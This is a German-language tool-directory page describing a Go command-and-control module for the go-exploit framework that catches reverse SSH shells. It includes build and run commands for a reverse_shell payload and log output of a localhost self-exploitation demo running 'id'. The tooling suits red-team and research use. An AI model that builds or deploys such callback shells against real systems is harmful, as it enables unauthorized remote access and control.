Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
external-c2-experiments — Go-Modul für externes C2 für go-exploit, das Reverse-SSH-Shells abfängt und einen Server-Listener sowie einen Payload-Client bereitstellt, um benutzerdefinierte C2-Profile in Exploits zu integrieren. | Kitploit
Tools/GitHubGitHub/vulncheck-oss/external-c2-experiments
Exploit-FrameworksExploitationPost-ExploitationPenetrationstestsCommand and ControlDienstprogramme & FrameworksRed TeamingRemote-Access-ToolPayload-Entwicklung
GitHubvulncheck-oss/external-c2-experiments

external-c2-experiments

Go-Modul für externes C2 für go-exploit, das Reverse-SSH-Shells abfängt und einen Server-Listener sowie einen Payload-Client bereitstellt, um benutzerdefinierte C2-Profile in Exploits zu integrieren.

Repository anzeigen
11vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Externes C2: SSH

Ein go-exploit externes C2-Modul, das Reverse-SSH-Shells unterstützt. Es dient zusätzlich als Demonstration, wie man externe C2-Profile in seine bevorzugten Payloads integriert. Das Ziel ist nicht, eine vollständig weaponisierte Payload mit Evasion und fortgeschrittenen Techniken bereitzustellen, sondern zu zeigen, wie man Kanäle für Payloads erstellt, die stärkere Evasion-Module implementieren und sich leicht in go-exploit integrieren lassen können.

Struktur

  • Das Kernpaket c2ssh, das die Schnittstellen und Strukturen für die Einrichtung eines Servers zum Abfangen von SSH-Payloads implementiert
  • ./payload enthält die Implementierung für Payloads, die von einem Exploit verwendet werden sollen; dies ist funktional der SSH-Client und ein dünner Wrapper um exec, basierend auf der Serverantwort
  • ./example enthält einen Selbstausbeutungs-Test, der eine kompilierte Beispiel-Payload ausführt

Beispielverwendung

  1. Kompiliere die Payload zur Verwendung im Exploit, um sie für den Exploit zugänglich zu machen; dies ist derzeit vom Framework entkoppelt, da man nicht immer Go-Payloads verwendet :)
  2. Führe den Exploit aus
go build -ldflags "-s -w -X main.Rshost=127.0.0.1 -X main.Rsport=2223" -o reverse_shell
poptart@grimm $ go run example/exploit.go -lhost 127.0.0.1 -lport 2222 -rhost 127.0.0.1 -rport 1337 -e -fll DEBUG -ell DEBUG -t 0
time=2024-08-06T12:09:02.762-06:00 level=DEBUG msg="Using the HTTP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
time=2024-08-06T12:09:02.763-06:00 level=STATUS msg="Starting target" index=0 host=127.0.0.1 port=1337 ssl=false "ssl auto"=false
time=2024-08-06T12:09:02.763-06:00 level=DEBUG msg="External SSH Listener starting: 127.0.0.1:2222"
time=2024-08-06T12:09:02.766-06:00 level=DEBUG msg="SSH: Handshaking for 127.0.0.1:38878"
time=2024-08-06T12:09:02.768-06:00 level=STATUS msg="Active shell SSH: Connection accepted from [email protected]:38878 session: 451e905e22ffbc7ab6235ad73379eeea2c65ba532405d81a431e1c5159ba1179 (SSH-2.0-OpenSSH_9.7)"
id
time=2024-08-06T12:09:04.725-06:00 level=STATUS msg="Running command on SSH client: 'id'"
time=2024-08-06T12:09:08.812-06:00 level=SUCCESS msg="uid=1000(poptart) gid=100(users) groups=100(users),1(wheel),67(libvirtd)\n"
Tool herunterladen